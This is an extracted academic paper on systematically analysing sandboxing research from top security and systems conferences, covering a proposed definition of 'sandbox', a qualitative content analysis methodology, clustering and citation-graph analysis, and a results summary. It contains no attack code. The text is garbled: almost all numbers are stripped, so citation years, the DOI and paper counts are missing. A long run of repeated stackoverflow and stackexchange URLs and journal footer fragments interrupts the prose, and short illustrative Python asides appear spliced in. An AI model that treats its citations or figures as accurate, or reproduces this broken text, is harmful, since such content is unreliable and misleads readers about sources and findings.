sandboxes in mainstream use have in common? they are largely dependent on relatively easily composed coarse-grained operating system features, they are essentially transparent to the users of sandboxed components, and they make little use of decades worth of research produced within the domain of software security sandboxing. researchers have spent the last several decades building sandboxes capable of containing computations ranging from fully featured desktop applications to subsets of nearly every kind of application in existence, from third party libraries in java programs to ads on web sites. sandboxes have been built to stop memory corruption exploits, ensure control- and data-flow integrity, enforce information flow constraints, introduce diversity where monocultures previously existed, and much more. what more can the community do to bring value? in this paper, we use multidisciplinary techniques from software engineering, statistics, the social sciences, and graph analysis to systematically analyze the sandboxing landscape as it is reflected by five top-tier security and systems conferences. 
we aim to answer questions about what sandboxes can already do, how they do it, what it takes to use them, what claims sandbox inventors make about their creations, and how those claims are validated. we identify and resolve ambiguity in definitions for “sandbox”, systematize ten years of sandbox research, and point out gaps in our current practices and propose ways forward in resolving them. we contribute the following: • a multi-disciplinary methodology for systematically analyzing the state of practice in a research domain (‘methodology’). • the first concise definition for “sandbox” that consistently describes research sandboxes (‘what is a sandbox’). • systemization of the research sandboxing landscape (‘results’). • identification of and proposed solutions to ( ) an over-reliance on ad hoc arguments for security validation and ( ) the neglect of sandbox and policy usability (‘strengthening sandboxing results’). what is a sandbox? in order to systematically analyze the “sandboxing” landscape we need to clarify the meaning of the term. we reviewed definitions used by practitioners and in papers within the field, both in the substance of the definitions and in their quality as definitions. this section reviews those definitions and establishes a definition for our use here, which we advance as an improved definition for the field. a definition should be a concise statement of the exact meaning of a word and may be accompanied by narration of some properties implied by the definition. in this case, it maass et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. should clearly distinguish between mechanisms that are and are not sandboxes. to gain widespread use, a new definition must include all mechanisms that are already widely considered to be sandboxes. in software security contexts, the term “sandboxing” has grown ambiguous. in an early published use, it described an approach for achieving fault isolation (wahbe et al., ). discussions where practicing programmers are trying to understand what sandboxing is often fail to achieve a precise resolution and instead describe the term by listing products that are typically considered to be sandboxes or cases where sandboxes are often used (http://stackoverflow.com/questions/ /what-is-sandboxing, http://security. stackexchange.com/questions/ /are-sandboxes-overrated, http://en.wikipedia.org/ w/index.php?title=sandbox (computer security)&oldid= ). however, we did find cases where attempts were made at a concise and general definition. a representative and accepted stackoverflow answer (http://security.stackexchange.com/questions/ / what-is-sandboxing) started with, “in the context of it security, ‘sandboxing’ means isolating some piece of software in such a way that whatever it does, it will not spread havoc elsewhere”—a definition that is not sufficiently precise to separate sandboxes from other defensive measures. even recently published surveys of sandbox literature have either acknowledged the ambiguity, then used overly-broad definitions that include mechanisms not traditionally considered to be sandboxes (schreuders, mcgill & payne, ), or have relied entirely on the use of examples instead of a precise definition (al ameiri & salah, ). schreuders writes, “although the terminology in use varies, in general a sandbox is separate from the access controls applied to all running programs. 
typically sandboxes only apply to programs explicitly launched into or from within a sandbox. in most cases no security context changes take place when a new process is started, and all programs in a particular sandbox run with the same set of rights. sandboxes can either be permanent where resource changes persist after the programs finish running, or ephemeral where changes are discarded after the sandbox is no longer in use. . . . ” this definition suffers from three problems. first, it is still overly reliant on examples and thus is unlikely to capture all security mechanisms that are uncontroversially called sandboxes. along the same lines, characterizations prefaced with, “in most cases . . . ”, are not precise enough to reliably separate sandboxes from non-sandboxes. finally, the comparison to access controls is not conclusive because it does not clarify which, if any, access control mechanisms applied to a subset of running programs are not sandboxes. in this section we aim to resolve this ambiguity to lay the groundwork for our analysis’s inclusion criteria. while this definition serves our purposes, we believe it can strengthen future attempts to communicate scientifically about sandboxes by adding additional precision. we derive a clear, concise definition for what a “sandbox” is using papers that appear in five top-tier security and operating system conferences, selected because their topics of interest are broad enough to include sandboxing papers most years. while we do not attempt to thoroughly validate our definition using commercial and open source sandboxes, it does encompass the tools with which we are most familiar. maass et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing http://stackoverflow.com/questions/ /what-is-sandboxing 
http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://security.stackexchange.com/questions/ /what-is-sandboxing http://dx.doi.org/ . /peerj-cs. 
we found a pool of potential sandboxing papers. of these, a subset use the term "sandbox" at least once, and a smaller number provide either an explicit or implicit definition of the term that is clear enough to characterize. the remaining papers that use the term make no attempt at a definition, or provide an ambiguous explanation that is intertwined with other ideas and spread over multiple sentences. within the set of definitions, we identify two themes: sandboxing as encapsulation and sandboxing as policy enforcement.

sandboxing as encapsulation has a natural analogy: sandboxes on playgrounds provide a place for children to play within clearly marked bounds, making the children easier to watch and less likely to get hurt or to hurt someone else. they also contain the sand, preventing it from getting strewn across neighboring surfaces. a similar analogy is used in an answer on the security stackexchange to the question, "what is a sandbox?" indeed, wahbe was working to solve the problem of encapsulating software modules (to keep a fault in a distrusted module from affecting other modules) when he popularized the term in this domain. while it is clear from at least one publication that the term sandbox was used in computer security earlier than wahbe's paper (neumann, ), many early software protection papers cite wahbe as the origin of the "sandbox" method (zhong, edwards & rees, ; wallach et al., ; schneider, ). at least one early commentator felt that this use of the term "sandbox" was merely renaming "trusted computing bases" (tcb) (mclean, ). we believe this section makes it clear that sandboxes meet common tcb definitions, but that not all tcbs are sandboxes.

the first table below lists the definitions we found that we characterize as falling within the theme of sandboxing as isolation. many of these definitions use the term "isolation," but we prefer the use of encapsulation. in object-oriented programming, an object encapsulates related components and selectively restricts access to some of those components. isolation, on the other hand, sometimes refers to a stronger property in which modules use entirely different resources and therefore cannot interfere with each other at all. sandboxed components often need to cooperate to be useful. cooperation and the idea of disjoint resources are present in wahbe's original use of the term "sandbox": wahbe was trying to reduce the communication overhead present in hardware fault isolation by instead creating software domains that run in the same hardware resources, but that do not interfere when faulty. one potential counterpoint to our use of "encapsulation" is that the term is typically used to refer to cases where the inside (e.g., of an object) is protected from the outside, whereas sandboxes often protect the external system from the contents of the sandbox. while this is a fair point, this paper does discuss sandboxes that protect their contents from the outside, and sandboxes exist that simultaneously defend the inside from the outside and vice versa (li et al., ). furthermore, one can consider that a sandbox encapsulates an external system that must be protected from a potentially malicious component. given these points, we maintain that encapsulation's recognition of cooperation is important enough to use the term over isolation. nevertheless, we retain the use of isolation when discussing existing definitions.

a second table below presents seven quotes that discuss sandboxing in terms of restrictions or policy enforcement.
these definitions reflect different dimensions of the same idea: a security policy can state what is allowed, what is forbidden, or both. the "sandbox" is the subject that enforces the policy, or "sandboxing" is the act of enforcing a policy. in short, these quotes cast sandboxing as policy enforcement.

table: definitions that speak about "sandboxing" in terms of isolation.
- zhang et al. ( ): "sfi (software(-based) fault isolation) uses instruction rewriting but provides isolation (sandboxing) rather than hardening, typically allowing jumps anywhere within a sandboxed code region."
- zeng, tan & erlingsson ( ): "it is a code-sandboxing technique that isolates untrusted modules from trusted environments. ... in sfi, checks are inserted before memory-access and control-flow instructions to ensure memory access and control flow stay in a sandbox. a carefully designed interface is the only pathway through which sandboxed modules interact with the rest of the system."
- geneiatakis et al. ( ): "others works have also focused on shrinking the attack surface of applications by reducing the parts that are exposed to attack, and isolating the most vulnerable parts, using techniques like sandboxing and privilege separation."
- de groef et al. ( ): "isolation or sandboxing based approaches develop techniques where scripts can be included in web pages without giving them (full) access to the surrounding page and the browser api."
- cappos et al. ( ): "such sandboxes have gained widespread adoption with web browsers, within which they are used for untrusted code execution, to safely host plug-ins, and to control application behavior on closed platforms such as mobile phones. despite the fact that program containment is their primary goal, flaws in these sandboxes represent a major risk to computer security."
- reis et al. ( ): "wagner et al. use system call interposition in janus to confine untrusted applications to a secure sandbox environment."
- cox et al. ( ): "our work uses vms to provide strong sandboxes for web browser instances, but our contribution is much broader than the containment this provides."

careful inspection of our definition tables shows that the same technique, software-based fault isolation (sfi), appears in both tables. zhang explicitly states that hardening is not used in sfi, but mccamant very clearly refers to operations being "allowed" and to the existence of a policy. while it could seem that the sandboxing-as-isolation and sandboxing-as-policy-enforcement camps are disjoint, we claim they are talking about different dimensions of the same idea. isolation refers to the what: an isolated environment where a module cannot do harm or be harmed. policy enforcement refers to the how: by clearly defining what is or is not allowed. to use another childhood analogy, we often sandbox children when we place them in the corner as a punishment. we isolate them by moving them away from everyone else and placing them in a specific, bounded location, and then we impose a security policy on them by making statements such as, "do not speak, look straight ahead, and think about what you did." we resolve ambiguity in the use of the term "sandbox" by combining these themes:

sandbox: an encapsulation mechanism that is used to impose a security policy on software components.

this definition concisely and consistently describes the research sandboxes we identify in the remainder of this paper.
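as a purely illustrative aside (not a system from our corpus), the short python sketch below shows the two themes the definition combines: a wrapper encapsulates a component so that callers must go through it, and an allow-list policy is imposed on the operations the component may perform. all class and operation names here are invented for the example.

```python
# toy illustration of the combined definition: a "sandbox" object encapsulates a
# component (callers must go through it) and imposes a security policy on it
# (an allow-list of operations). illustrative only; not a real isolation mechanism.
class PolicyViolation(Exception):
    pass

class Sandbox:
    def __init__(self, component, allowed_operations):
        self._component = component                  # encapsulation
        self._policy = set(allowed_operations)       # the security policy

    def invoke(self, operation, *args):
        if operation not in self._policy:            # policy enforcement
            raise PolicyViolation(f"operation {operation!r} is not permitted")
        return getattr(self._component, operation)(*args)

class UntrustedComponent:
    def read_file(self, path):
        return f"contents of {path}"

    def send_network(self, host):
        return f"sent data to {host}"

sandboxed = Sandbox(UntrustedComponent(), allowed_operations={"read_file"})
print(sandboxed.invoke("read_file", "/tmp/demo.txt"))    # allowed by the policy
try:
    sandboxed.invoke("send_network", "example.com")      # denied by the policy
except PolicyViolation as error:
    print(error)
```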
table: definitions that speak about "sandboxing" in terms of policy enforcement.
- xu, saïdi & anderson ( ): "we automatically repackage arbitrary applications to attach user-level sandboxing and policy enforcement code, which closely watches the application's behavior for security and privacy violations such as attempts to retrieve a user's sensitive information, send sms covertly to premium numbers, or access malicious ip addresses."
- chandra et al. ( ): "the re-executed browser runs in a sandbox, and only has access to the client's http cookie, ensuring that it gets no additional privileges despite running on the server."
- politz et al. ( ): "adsafe, like all web sandboxes, consists of two inter-dependent components: (1) a static verifier, called jslint, which filters out widgets not in a safe subset of javascript, and (2) a runtime library, adsafe.js, which implements dom wrappers and other runtime checks."
- tang, mai & king ( ): "fundamentally, rule-based os sandboxing is about restricting unused or overly permissive interfaces exposed by today's operating systems."
- sun et al. ( ): "sandboxing is a commonly deployed proactive defense against untrusted (and hence potentially malicious) software. it restricts the set of resources (such as files) that can be written by an untrusted process, and also limits communication with other processes on the system."
- mccamant & morrisett ( ): "executing untrusted code while preserving security requires that the code be prevented from modifying memory or executing instructions except as explicitly allowed. software-based fault isolation (sfi) or "sandboxing" enforces such a policy by rewriting the untrusted code at the instruction level."
- provos ( ): "for an application executing in the sandbox, the system call gateway requests a policy decision from systrace for every system call."

methodology

in this section, we discuss the steps we took to select and analyze sandboxing papers and the sandboxes they describe. our methodology is primarily based on the book "qualitative content analysis in practice" (qca) (schreier, ); barnes ( ) provides a succinct summary of the methodology in his dissertation. this methodology originates in the social sciences (berelson, ; krippendorff, ; denzin & lincoln, ) and is intended to repeatably interpret qualitative data to answer a set of research questions. the figure below summarizes the iterative process we used to define our questions, pick and interpret papers ('picking papers' and 'categorizing the dataset'), and develop our results ('analyzing the dataset').

figure: the iterative process used to define research questions, build a dataset, and interpret the set to answer the questions. this process is inspired by qca (schreier, ).

qca goes well beyond a systematic literature review (budgen & brereton, ; kitchenham et al., ). while both qca and systematic reviews require the definition of research questions and repeatable processes for collecting source material, reviews stop short of detailed analysis; qca carries on where reviews end. when performing qca, researchers define coding frames to clearly and repeatably establish how the source material will be interpreted to answer the research questions. the frames contain
codes that summarize blocks of data and definitions for each code. furthermore, qca methodologies dictate how the coding frames are to be applied, by segmenting the entirety of the data such that each segment can be labeled with at most one code. this ensures that the data is coded without missing relevant data, while reducing the researcher's bias towards some bits of data. finally, qca requires researchers to test their full process before carrying out the analysis. together, these steps allow researchers to reliably and effectively interpret text to answer research questions that are not possible to answer using a purely quantitative analysis. for example, schreier points out that a quantitative analysis can determine how many women appear in magazine advertisements relative to men, but a qualitative analysis (e.g., qca) is required to determine whether or not women are more likely to be placed within trivial contexts than men in those ads (schreier, ). we followed the qca methodology specified by schreier with one major deviation: we did not segment the text, because the vast majority of the content in the papers is irrelevant to our needs. most uses of qca attempt to capture the content of a text in its entirety; this was not our goal, so we analyzed text more selectively.

the sandboxes we describe in this paper were selected from the proceedings of five conferences: ieee symposium on security and privacy (oakland), usenix security, acm conference on computer and communications security (ccs), acm symposium on operating system principles (sosp), and usenix symposium on operating system design and implementation (osdi). we restricted our selection to particular conferences to improve reproducibility; because of this choice, the set of papers evaluated against our inclusion criteria is very well defined. to select these conferences, we collected all of the sandboxing papers we were aware of, and the selected five venues contained far more sandboxing papers than any other venue. based on earlier criticism of this paper, we re-evaluated our data set by looking at the past four years of proceedings at unselected venues such as the usenix annual technical conference (atc), programming language design and implementation (pldi), and object-oriented programming, systems, languages and applications (oopsla). these venues contained fewer sandboxing papers than our selected venues, and those that appeared were not significantly different in form or content from those in the selected venues. in fact, with rare exceptions, the sandboxing papers at the unselected venues were written by the same authors as one or more papers in our data set. the selected conferences are widely regarded as the top-tier conferences in software security and operating systems (http://www.core.edu.au/index.php/conference-rankings, https://personal.cis.strath.ac.uk/changyu.dong/ranking.html, http://faculty.cs.tamu.edu/guofei/sec_conf_stat.htm, http://webdocs.cs.ualberta.ca/~zaiane/htmldocs/confranking.html); therefore, our data reflects the consensus of large communities.

the table below presents our twelve research questions, the areas each question attempts to illuminate, and a comprehensive list of their answers as manifested by our paper corpus.
we derived an initial set of questions by considering which broad aspects of sandboxes are poorly understood and where better understanding may change how the community performs research in this space. as a result, the questions are necessarily biased by our own backgrounds and personal experiences; in particular, this led to an emphasis on questions about how mechanisms and policies are derived, applied, and evaluated. we added questions while we performed the analysis when we found that we had the data to answer new and interesting questions. overall, these questions aim to capture a comprehensive snapshot of the current state of sandboxing research, with an emphasis on where sandboxes fit into the process of securing software systems, what policies are enforced and how they are defined and constructed, and what claims are made about sandboxes and how those claims are validated.

picking papers

we selected papers from several years' worth of proceedings at the five conferences mentioned above. we decided whether a paper was included in our sample based on rigorous inclusion criteria so that the process of including or excluding papers is repeatable. the most important criterion is that the paper describes a sandbox that meets the definition given in 'what is a sandbox?'. the remaining criteria were added as we carried out the study to exclude papers that are incapable of answering the research questions and to clarify relevant nuances in the definition. papers were included if they met the following criteria:

• the paper documents the design of a novel tool or technique that falls under the sandbox definition
• the paper is a full conference paper
• the paper is about an instance of a sandbox (e.g., not a component for building new sandbox tools, theoretical constructs for sandboxes, etc.)
• techniques are applied using some form of automation (e.g., not through entirely manual re-architecting)
• a policy is imposed on an identifiable category of applications or application subsets:
  - the policy is imposed locally on an application (e.g., not on the principal the application executes as, not on network packets in transit, etc.)
  - the category encompasses a reasonable number of real-world applications (e.g., it does not require the use of (1) a research programming language, (2) extensive annotations, or (3) non-standard hardware)
table: our research questions, the areas each question attempts to illuminate, and potential answers. the answers are codes in the content analysis process we apply; answers are not necessarily mutually exclusive. definitions for the terms in this table appear in our coding frames (see supplemental information) with examples.

sandbox lifecycle
- where in the architecture are policies enforced? (component, application, host)
- how and when are policies imposed? (statically, dynamically, hybrid)

security outcomes
- what resources do the sandboxes protect? (memory, code/instructions, files, user data, communications)
- which components do the sandboxes protect? (component, application, application class)
- at what point will sandboxes catch exploits? (pre-exploit, post-exploit)

effort and applicability
- what must be done to apply the sandboxes? (nothing, select pre-made policy, write policy, run tool, install tool)
- what are the requirements on sandboxed components? (none, source code, annotated source code, special compiler, compiler-introduced metadata, sandbox framework/library components)

policy provenance and manifestation
- who defines policies? (sandbox developer (fixed), sandbox user (user-defined), application developer (application-defined))
- how are policies managed? (central policy repository, no management)
- how are policies constructed? (encoded in sandbox logic, encoded in application logic, user written)

research claims and validation
- what claims are made about sandboxes? (performance, security, applicability)
- how are claims validated? (proof, analytical analysis, benchmark suite, case studies, argumentation, using public data)
- how are sandboxes released for review? (source code, binaries, not available)
we gathered papers by reading each title in the conference proceedings for a given year. we included a paper in our initial dataset if the title gave any indication that the paper could meet the criteria. we refined the criteria by reviewing papers in the initial dataset from oakland before inspecting the proceedings from the other venues. we read the remaining papers' abstracts, introductions, and conclusions, and excluded papers as they were being interpreted if they did not meet the criteria. we maintained notes about why individual papers were excluded from the final set; our full list of papers with exclusion notes is available in supplemental information.

categorizing the dataset

to interpret papers, we developed coding frames in which a category is a research question and a code is a possible answer to the question (our full coding frames are available in supplemental information). to ensure consistency in coding, our frames include detailed definitions and examples for each category and code. our codes are not mutually exclusive: a question may have multiple answers. we developed the majority of our frames before performing a detailed analysis of the data, but with consideration for what we learned about sandboxing papers while testing the inclusion criteria above on our data from oakland. we learned that evaluative questions were quite interesting while coding papers, thus frames concerning what claims were made about a sandbox and how those claims were validated became more fine-grained as the process progressed. whenever we modified a frame, we updated the interpretations of all previously coded papers. we tested the frames by having two coders interpret different subsets of the oakland segment of the initial dataset.
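to make the structure of a coding frame concrete, the sketch below shows one way a frame and a coded paper could be represented and cross-checked programmatically; this is our own illustration (the category names and codes are abridged from the table above), not tooling used in the study.

```python
# illustrative coding frame: each category (a research question) maps to the set
# of codes (possible answers) it allows. codes are not mutually exclusive, so a
# coded paper stores a set of codes per category. names are abridged/invented.
CODING_FRAME = {
    "where are policies enforced": {"component", "application", "host"},
    "when are policies imposed": {"statically", "dynamically", "hybrid"},
    "how are claims validated": {"proof", "analytical analysis", "benchmark suite",
                                 "case studies", "argumentation", "using public data"},
}

def check_coding(paper_codes):
    """raise if any assigned code is not defined for its category in the frame."""
    for category, codes in paper_codes.items():
        allowed = CODING_FRAME.get(category)
        if allowed is None:
            raise ValueError(f"unknown category: {category!r}")
        unknown = set(codes) - allowed
        if unknown:
            raise ValueError(f"codes {sorted(unknown)} are not defined for {category!r}")

# a hypothetical coded paper: multiple answers are allowed within a category
check_coding({
    "where are policies enforced": {"application"},
    "when are policies imposed": {"statically", "dynamically"},
    "how are claims validated": {"benchmark suite", "case studies"},
})
```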
to interpret a paper, each category was assigned the appropriate code(s), and a quote justifying each code selection was highlighted and tagged in the paper's pdf (a full list of quotes with code assignments is available in supplemental information). while testing, the coders swapped quotes sans codes and independently re-assigned codes to ensure consistency, but we did not measure inter-rater reliability. code definitions were revised where they were ambiguous. while there is still some risk that different coders would select different quotes or assign different codes to the same quote, we believe our methodology sufficiently mitigated the risk without substantially burdening the process, given the large scope of this effort. after coding every paper, we organized the codes for each paper by category in a unified machine-readable file (hereafter referred to as the summary of coded papers) for further processing. the summarized version of our dataset is available as supplemental information; this spreadsheet was converted to a csv file to perform statistical and graph-based analyses.

analyzing the dataset

to summarize the differences and similarities between sandboxing papers, we attempted to identify clusters of similar sandboxing techniques. to do so, we first calculated a dissimilarity matrix for the sandboxes. for category k, let p_ijk be the number of codes that sandboxes i and j share, divided by the total number of codes in that category they could share. for categories in which each sandbox is interpreted with one and only one code, p_ijk is either 0 or 1; for other categories, it falls in the interval [0, 1]. the dissimilarity between i and j is then d_ij = Σ_k (1 − p_ijk). we fed the resulting dissimilarity matrix into a hierarchical agglomerative clustering algorithm (kaufman & rousseeuw, ), implemented in r with the cluster package (r core team, ; maechler et al., ). this algorithm begins by treating each sandbox as its own cluster, and then iteratively merges the clusters that are nearest to each other, where the distance between two clusters is defined as the average dissimilarity between the clusters' members. the agglomerative clustering process is displayed in dendrograms. we stopped the agglomerative process at the point at which two clusters remained, producing two lists of sandboxes, one for each cluster. to interpret the resulting clusters, we produced bar charts displaying the code membership by cluster. we conducted this analysis three times: once using all of the categories to define dissimilarity, once using all categories except those for claims, validation, and availability, and once using only the validation categories. we do not present the plots from the analysis that ignored claims, validation, and availability because it did not produce results different from those generated using all categories.
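as an illustration of this computation (ours, not the authors' r code), the python sketch below builds the dissimilarity matrix from per-category code sets and applies average-linkage agglomerative clustering, cutting the tree at two clusters. the paper names and categories are invented, and the sharing proportion p_ijk is approximated here as a jaccard-style ratio, which is one reading of the definition above.

```python
# illustrative sketch: dissimilarity d_ij = sum_k (1 - p_ijk) over categories k,
# followed by average-linkage agglomerative clustering cut at two clusters.
from itertools import combinations

import numpy as np
from scipy.cluster.hierarchy import fcluster, linkage
from scipy.spatial.distance import squareform

# hypothetical coded sandboxes: category -> set of codes assigned to the paper
papers = {
    "sandbox_a": {"policy": {"fixed"}, "resources": {"memory", "code"}},
    "sandbox_b": {"policy": {"user-defined"}, "resources": {"files", "communications"}},
    "sandbox_c": {"policy": {"fixed"}, "resources": {"memory"}},
}

names = sorted(papers)
dist = np.zeros((len(names), len(names)))
for (i, a), (j, b) in combinations(enumerate(names), 2):
    d_ij = 0.0
    for category in papers[a]:
        shared = papers[a][category] & papers[b][category]
        possible = papers[a][category] | papers[b][category]  # assumption: jaccard-style denominator
        p_ijk = len(shared) / len(possible) if possible else 0.0
        d_ij += 1.0 - p_ijk
    dist[i, j] = dist[j, i] = d_ij

# average linkage on the condensed distance matrix, then cut into two clusters
tree = linkage(squareform(dist), method="average")
clusters = fcluster(tree, t=2, criterion="maxclust")
print(dict(zip(names, clusters.tolist())))
```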
we conducted correlational analyses to learn whether sandbox validation techniques have improved or worsened over time, and whether sandbox publications with better (or worse) validation received more citations. the validation codes were ordered in the following way: proof > analytical analysis > benchmarks > case study > argumentation > none. this ordering favors validation techniques that are less subjective. while it is possible for a highly ranked technique to be applied less effectively than a lower ranked technique (e.g., a proof that relies on unrealistic assumptions relative to a thorough case study), this ranking was devised after coding the papers and is motivated by the real-world applications of each technique in our dataset. each claim type (security, performance, and applicability), then, was an ordinal random variable, so rank-based methods were appropriate. when a sandbox paper belonged to two codes in a particular validation category, we used its highest-ordered code to define its rank, and lower-ordered codes to break ties. so, for instance, if paper a and paper b both included proofs, and paper a also included benchmarks, paper a would be ranked higher than paper b. to test whether a claim type was improving over time, we estimated the spearman correlation (spearman, ) between its codes and the year of publication, and hence tested for a monotonic trend. testing whether papers with better validation, in a particular category, received more citations necessitated accounting for year of publication, since earlier papers typically have higher citation counts. to do so, we regressed paper citation rank against both publication year and category rank. (we used the rank of papers' citation counts as the dependent variable, as opposed to the citation counts themselves, due to the presence of an influential outlier, terra (garfinkel et al., ). scatterplots show the relationship between citation ranks and publication year to be approximately linear, so a linear adjustment should suffice.) there was a "validation effect" if the coefficient on the validation measure was significantly different from zero. we conducted four separate regression analyses: one in which citation ranks were regressed on publication year and the category ranks of all three validation criteria, one in which citation ranks were regressed on publication year and security validation only, one in which citation ranks were regressed on publication year and performance validation only, and one in which citation ranks were regressed on publication year and applicability validation only.

we constructed a citation graph using the papers in our set as nodes and citations as edges as a final means of better understanding the sandboxing landscape. we clustered the nodes in this graph using the same clusters found statistically, using the process described above, and using common topics of interest we observed. the topics of interest are typically based on the techniques the sandboxes apply (e.g., control flow integrity (cfi), artificial diversity, etc.). we evaluate these clusterings using the modularity metric, which enables us to compare the quality of the different categorizations. modularity is the fraction of edges that lie within a partition, above the number that would be expected if edges were distributed randomly.

results

we derived our results from the various statistical clusters of our summary of coded papers, trends explicit in this dataset, and observations made while reading the papers or analyzing our summarized data. as our dataset is public, we encourage readers to explore the data themselves.

note while interpreting the statistical clusters that they are not representative of how papers are related in terms of broad topics of interest. when we applied the statistical clusters to the citation graph of the papers in our set, the resulting modularity scores were negligible, whether papers were clustered based on all of the attributes we coded or on just the validation attributes. these modularity scores mean that the statistical clusters are no better than randomly clustering papers when considering how they cite each other. these poor modularity scores make sense because authors are much more likely to cite papers that use similar techniques or tackle similar problems than papers that use similar validation strategies. we confirmed the latter observation by computing the modularity for overlapping groups (lázár, ábel & vicsek, ) based on validation, which is also negative and confirms that partitions built from the validation techniques do not direct citation graph structure. indeed, when we clustered papers in the citation graph based on the topics of interest we observed while interpreting the set, the modularity score is significantly better than that of a random clustering. the citation graph with topic clusters is shown in the figure below. while these clusters are potentially of sociotechnical interest to the community, we must look at lower-level attributes to understand how sandboxes are to be applied in practice and how they improve the security posture of real systems. the statistical clusters fill that role. two later figures show the codes that are members of the fixed-policy and user-defined-policy clusters, respectively, when all categories are considered, and a dendrogram for these clusters appears in a further figure. many of our results are interpretations of these charts. the table below succinctly describes our results per research question and references the later sections where more details are found. the remainder of this section presents those details.

table: summary of our research questions and results.
- where in a system's architecture are policies enforced? there is an emphasis on enforcing policies in the operating system or transforming applications to enforce a policy, over using application hosts (e.g., language-hosting virtual machines, browsers, etc.). (see 'sandboxes: building materials for secure systems')
- when are policies imposed? static, dynamic, and hybrid strategies are roughly equally favored in all domains, but with a slight preference for strictly static or dynamic approaches. (see 'sandboxes: building materials for secure systems')
- what application resources are protected by sandboxes? sandboxes with fixed policies tend to prevent memory corruption or protect properties of application code (e.g., control flow). user-defined policies are correlated with policies that are more diverse and cover the gamut of application-managed resources. (see 'sandboxes: building materials for secure systems')
- what types of components are protected by sandboxes? sandboxes that use fixed policies tend to require the user to target specific components, while those with user-defined policies tend to allow for broader targeting. (see 'sandboxes: building materials for secure systems')
- at what point in the process of an attack will an exploit violate sandbox policies? sandboxes are primarily pro-active, disrupting exploits before a payload can be executed. where users must define a policy, sandboxes tend to be pro-active in attempting to stop exploits, but also limit the range of possible behaviors a payload can exhibit. (see 'sandboxes: building materials for secure systems')
- what are the requirements of people applying sandboxes? sandboxes that have fewer requirements for people tend to have more requirements for the application. similarly, having a fixed policy is correlated with more requirements of the application, while user-defined policies are correlated with more requirements of the user. (see 'policy flexibility as a usability bellwether')
- what are the requirements of components being sandboxed? sandboxes with fixed policies most often require that applications be compiled using a special compiler. (see 'policy flexibility as a usability bellwether')
- who defines sandbox policies? policies are most often defined by the sandbox developer at design time. (see 'policy flexibility as a usability bellwether')
